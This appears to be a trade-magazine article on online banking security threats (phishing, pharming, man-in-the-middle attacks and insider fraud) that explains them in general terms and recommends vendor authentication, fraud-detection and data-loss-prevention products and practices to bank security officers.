There are challenges for banks today to offer a safe online banking experience to customers, but it can be addressed with proper strategy and solutions. This article explains few of major challenges and their preventive measurements.

Banking industry has witnessed evolution of different phases of its business process in its long journey till date. Banking has become as easier today as it was never earlier. Sitting at home or anywhere, you can do the money transaction in few seconds through internet. Yes, we are experiencing a new age of digital banking, but, are this banking processes completely secured? Can we do our money transaction over internet without any fear? That’s a big question. Today more and more people love to do online banking to save their precious time and energy and in fact banks also advocate for this procedure, since it saves banks’ manpower and others operational costs a lot.

Hackers are eyeing almost all size of banks but large banks are a natural target due to their size and their maintenance of sensitive consumer information and assets. Besides phishing and spoofing attacks, banks are experiencing new attacks, such as DNS poisoning (this is a very interesting subject, which we have already covered in our past issue) and Man-in-the-Middle (explained in detail in this article here below), developed and shared through black market forums, almost weekly. Over the next year malware is likely to become an even greater threat, but banks also are strengthening their existing measures and building new measures to combat it.

Real Serious Threats Today

Over a period of the last few decades/years there has been phenomenal growth in the volume of data pertaining to customers and transactions as well as bank’s internal data. Today due to anywhere anytime banking, Net banking, Phone Banking etc, the complexities of transactions has increased thereby increasing the threat of data security. With more and more data now available in digital form with banks, data security is an area of concern for banks/FIs today. This combined with the rapid growth in online phishing and identity scams and increasing regulatory pressure, online security is a critical concern among banks today.

Experts believe that the most serious threats in relation to online banking are phishing, pharming and Trojan attacks. Pharming is a hacker's attack aiming to redirect a website's traffic to another, bogus website. Pharming can be conducted either by changing the hosts file on a victim’s computer or by exploitation of a vulnerability in DNS server software.

Trojans and associated crimeware are responsible for severe damage too. Phishing has an impact but it often lacks sophisticated crimeware, although that is changing. Experts are also seeing big growth in Man-in-the-Middle attacks. They can be more sophisticated—they can come in through a phishing email, and instead of bringing the user to a webpage designed to look like a bank, it directs to a server for a real-time attack. Online fraudsters will try and prolong the length of the attack, such as multiple re-directs. They are also obtaining SSL digital certificates so that more educated people who look for these for validation will see it—and this establishes more credibility and increases the rate of fraud.

Industry is also witnessing advanced development of the online fraud global supply chain. The fraudster might be in Eastern Europe but taking over a PC in China in order to attack an American bank. Fraudsters always go after the weakest link. If a bank puts anti-fraud measures in place, the fraudsters will move on to the next less-protected organization. It’s a complete fraud supply chain; different fraudsters perform different parts of a scam. There are three main groups of the crime-ridden ecosystem.

There is also growth in online credit card “stores” where online fraudsters can buy and sell stolen credit card information. These websites are in multiple languages, and they even have an affiliate program. If the fraudster drives traffic to the credit card store website from other websites, they get paid a fee. There is an area called click fraud, using botnets to automatically increase the traffic to those sites—which means there are fraudsters going after fraudsters.

Figure: 1

The Indian Banking industry is increasingly encouraging Indian customers to manage their accounts online. India has around 49 million (According to a study conducted by JuxtConsult India Online 2008) internet users out of which 84% of have bank accounts and Indian banking customers can now request for online account statements, check account balance, transfer money, pay bills and perform various other account activities. This makes banking processes more convenient and flexible for the customer whilst making banking processes more efficient and cost effective for the Bank. Approximately 30 percent (According to the ReadiMines survey conducted in April 2008) of India's top banks have fallen victim to identity theft in the last one year. Indian consumers are apprehensive about internet banking mainly due to security concerns. The figure above (figure 1) reveals the data on the concern of online banking users across the world.

Apart from stated various kinds of threats, some threats are emerging in massive way with significant damaging power in current online banking scenario. These threats are enough sophisticated and powerful to exploit any vulnerability if found. Most recently ‘Man-in-the-middle’ attack has emerged as a powerful threat in banking vertical, though this attacking concept is not new but this has been empowered and upgraded with much advanced techniques. Simultaneously inside employee threats have also emerged very strongly in the entire banking threat landscape. Let’s discuss this threat in details.

‘Man-In-The-Middle’ Attack

‘Man in the middle’ attack is on the rise especially in the banking vertical. A fraudster or malicious hacker intercepts the transaction between the user and Web-banking server. The hacker compromises and modifies the electronic communication link between the user and the bank's Web server in a bid to obtain financial gain.

When users log into their bank websites, the bank demands authentication from the user: an account number and a password. The attacker sitting in the middle receives the request from the bank and passes it to the user. The user responds to the attacker, who passes that response to the bank. Now the bank assumes it is talking to the legitimate user, and the attacker is free to send transactions directly to the bank. This kind of attack is becoming a more popular identity-theft tactic.

The man-in-the middle attack intercepts a communication between two systems. For example, in an http transaction the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication.

Figure: 2

The MITM attack is very effective because of the nature of the http protocol and data transfer which are all ASCII based. In this way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context.

The MITM attack could also be done over an https connection by using the same technique; the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with the attacker, and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but the user may ignore the warning because he doesn’t understand the threat. In some specific contexts it’s possible that the warning doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.

A man-in-the-middle attack becomes a successful one when the attacker impersonates each endpoint to the satisfaction of the other. Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. In order to safeguard from MITM threat, people can use various types of authentication keys i.e. Public Key Infrastructures (PKI) , Stronger mutual authentication , Secret keys or high information entropy secrets , Passwords (low information entropy secrets) , Other criteria, such as voice recognition or other biometrics, Off-the-Record Messaging for instant messaging , Off-channel verification , Carry-forward verification. Apart from that it is essential that people take care of their communication, and do not pass on critical information of their Passwords, Bank Accounts etc. to any strangers online or offline.

Solutions like Verisign’s EVSSL, RSA’s Adaptive Authentication and Entrust’s Entrust IdentityGuard and TransactionGuard are quite appropriate to prevent MITM attacks. EVSSL certificates authenticate websites for online transactions .These certificates require a more extensive investigation of the website requesting it and follow stricter guidelines. If a website has an EVSSL certificate the browser will glow green indicating it’s a safe and secure site. The green browser bar will also display both the name of the verified organization as well as the SSL provider, allowing users to confirm the genuine name of the businesses with which they are interacting.

Figure: 3

RSA Adaptive Authentication is a comprehensive authentication and fraud detection platform that monitors and authenticates customer activity based on risk levels, institutional policies, and customer segmentation. Adaptive Authentication is powered by risk-based authentication, an intelligent system that authenticates all users behind-the-scenes by measuring a series of risk indicators. This transparent authentication provides for a superior user experience as customers are only challenged in the highest risk scenarios.

Entrust IdentityGuard is a versatile authentication platform that enables companies to apply the right level of strong authentication, tailored to the risk associated with the user or user transaction. The platform can be integrated into an existing environment to provide a range of affordable authentication options that can be implemented, as required, without the need to deploy expensive hardware or introduce significant changes to the user experience.

Entrust TransactionGuard is a zero-touch fraud detection solution that searches for fraudulent behavior and access patterns. It rapidly translates the massive volumes of data streams generated by transactional Web sites into intelligible information about customer behavior. Entrust TransactionGuard identifies potentially suspicious behavior and high-risk activities with no impact on system performance or the user experience.

Inside Employee Threat

Insider threat is a growing criminal activity, and given the current economic conditions there is a high risk of this fraud occurring. In the banking vertical the most prevalent threat is theft for financial gain, followed by IT sabotage and theft for business advantage. Disgruntled employees can delete relevant company data, bring down networks at the company, steal business trade secrets, strategies, intellectual property, personal customer information such bank account information, modifying credit history or changing name on a check etc causing huge damages to the bank both financially and reputation wise. These disgruntled employees create unknown access paths, log on and access unauthorized files and information after being terminated.

Banks are susceptible to inside threats by their “Security by Obscurity” outlook. Due to lack of good monitoring and audit controls, most of the unauthorized access controls go unnoticed. Even if some access violations are found they are normally not reported or scrutinized as most companies would not have the forensic tools and capabilities required to do this.

Today banks need to proactively log and monitor to ensure insider attacks can be mitigated. Implementing data leakage tools, conducting enterprise wide risk assessments, strengthening internal controls and effective audit functions can all lead to preventing the insider attack from happening. A Security Incident and Event Management solution like RSA envision, coupled with RSA Access Manager would be a cheap and easy way to solve this problem. Other than good logging and monitoring practices banks also need to implement security solutions that mitigate insider threats. Solutions like VeriSign Identity Protection (VIP) services protect consumer online identities and accounts with a trusted, convenient authentication experience and behind-the-scenes, real-time fraud detection. VIP is the most comprehensive suite of two-factor identity protection and authentication services designed to strengthen and protect consumers' digital identities on the Internet.

A Data Loss Prevention (DLP) strategy can also go a long way in plugging sensitive information and data losses for organizations. A good security strategy would have DLP as its core with other access and data controls supporting it. The biggest challenge most organizations face today is to find sensitive data spread across the organization. The data could be lying within the data center on desktops and laptops and also in transit over the network. A good DLP solution helps the organization ‘Discover’ and ‘Classify’ data based on the organization's priorities and policies. Once the organization is aware of what needs protection it can use its resources judiciously and invest in protecting the right resources.

Few suggestions for Bank CISOs

CIOs today should concentrate on how they can build security into their IT infrastructure and leverage it to effectively support and accelerate their strategic business goals. Experts advise CISOs to follow certain best practices that can improve their company’s ability to secure sensitive customer data, protect revenue, ensure customer loyalty, build brand value and meet government regulations. To achieve this standard, few suggestions are here below, advised by experts.

Identifying Sensitive Data

Not all data is of equal importance from a security perspective. The first step in preventing enterprise data loss is to determine which data is most sensitive—or at highest risk – to your business. Then, you can prioritize your efforts and define appropriate polices.

You need to understand your business structure, examine the various departments and lines of business across your organization, and identify both the regulatory and non-regulatory security drivers for each department. The next step is to determine the data categories, elements, and owners for each class of information. Then, you should determine which elements of the information are most critical and which department or business unit within the company owns this data. Finally, after you have classified your data, you must then define the policies—the rules for appropriate handling of the data—including which employees and applications are authorized to access this data and how, when, and from where they are allowed to access it.

Locating sensitive data

Data can be stored in a database, on disks, which is likely backed up by other disks or tape media. Additionally, your data is likely accessed through a variety of applications and from a wide array of devices, transformed on desktops, laptops, and wireless hand-helds, e-mailed to other users, and then stored on even more file servers or collaboration portals. Through the data discovery process, your company can create a map of its critical and sensitive data which serves as a foundation for your security policy and control strategy. But in order to be effective, data discovery must be embraced as a continuous process, not just a one-time event, as neither your organization's data nor your use of it is static.

Understand origin and nature of your risks

Lapses in business processes and innocent mistakes on the part of users are actually more common than a malicious attack from outside your organization. Creating a risk model that takes into account all the potential ways your data might be compromised or stolen provides the context you need to implement an appropriate control strategy that outlines both the types of control mechanisms (i.e., how to secure the data) as well as the points of control (i.e., where to secure the data).

Creating strategy based on data and associated risks

Once you understand where your sensitive data resides and the risks at those locations in your infrastructure, you can develop an appropriate control strategy. That strategy will likely include both processes and technology. The physical control strategy is comprised of two components: the control mechanisms (i.e., the types of controls), and control points (i.e., where in the infrastructure they are placed; at the storage, database, file server, application, network, or end point).

Manage security centrally

To avoid policy misalignment, high management costs, and a lack of business process continuity, companies must manage their security policies and control mechanisms centrally. Centralizing the administration of security policies ensures that control points consistently enforce security rules and makes proactive monitoring of activity that could result in a security violation easier to automate. The second piece of centralized security management involves encryption keys. With centralized key management, encryption controls can be effectively and consistently implemented across all control mechanisms, protecting the organization from data breaches due to human error, lost keys, or incompatible and conflicting encryption policies.

Finally, when encrypted data needs to be shared between applications, groups, or infrastructures, the lack of centralized management for key sharing means either the data needs to be decrypted before sending it from one point to another and re-encrypted on the other end, causing increased overhead and vulnerabilities. Without centralized management of both security policies and encryption keys, processes can be irrevocably broken, leading to business disruption.

Constant Security Auditing

By correlating events in your data control systems—such as encryption and loss prevention—in real-time, you can quickly respond to incidents as they occur, remediating any potential losses. So, by establishing auditing best practices and implementing an effective SIEM (Security Information and Event Management) system, you can reduce the cost and increase the efficiency of compliance, risk management, and forensics. Equally important, auditing provides an opportunity for continuous improvement. Security should always be viewed as a process rather than an event.

Conclusion

With the emergence of technically advanced and complicated blended threats, online banking today is experiencing tremendous challenges from cyber criminals. But proper implementation and execution of advanced proactive security solution significantly can minimize the risk and can combat sophisticated threats.

—By: ‘InfoSecurity’ Bureau with major inputs from VeriSign, RSA, Utimaco and Aujas Network.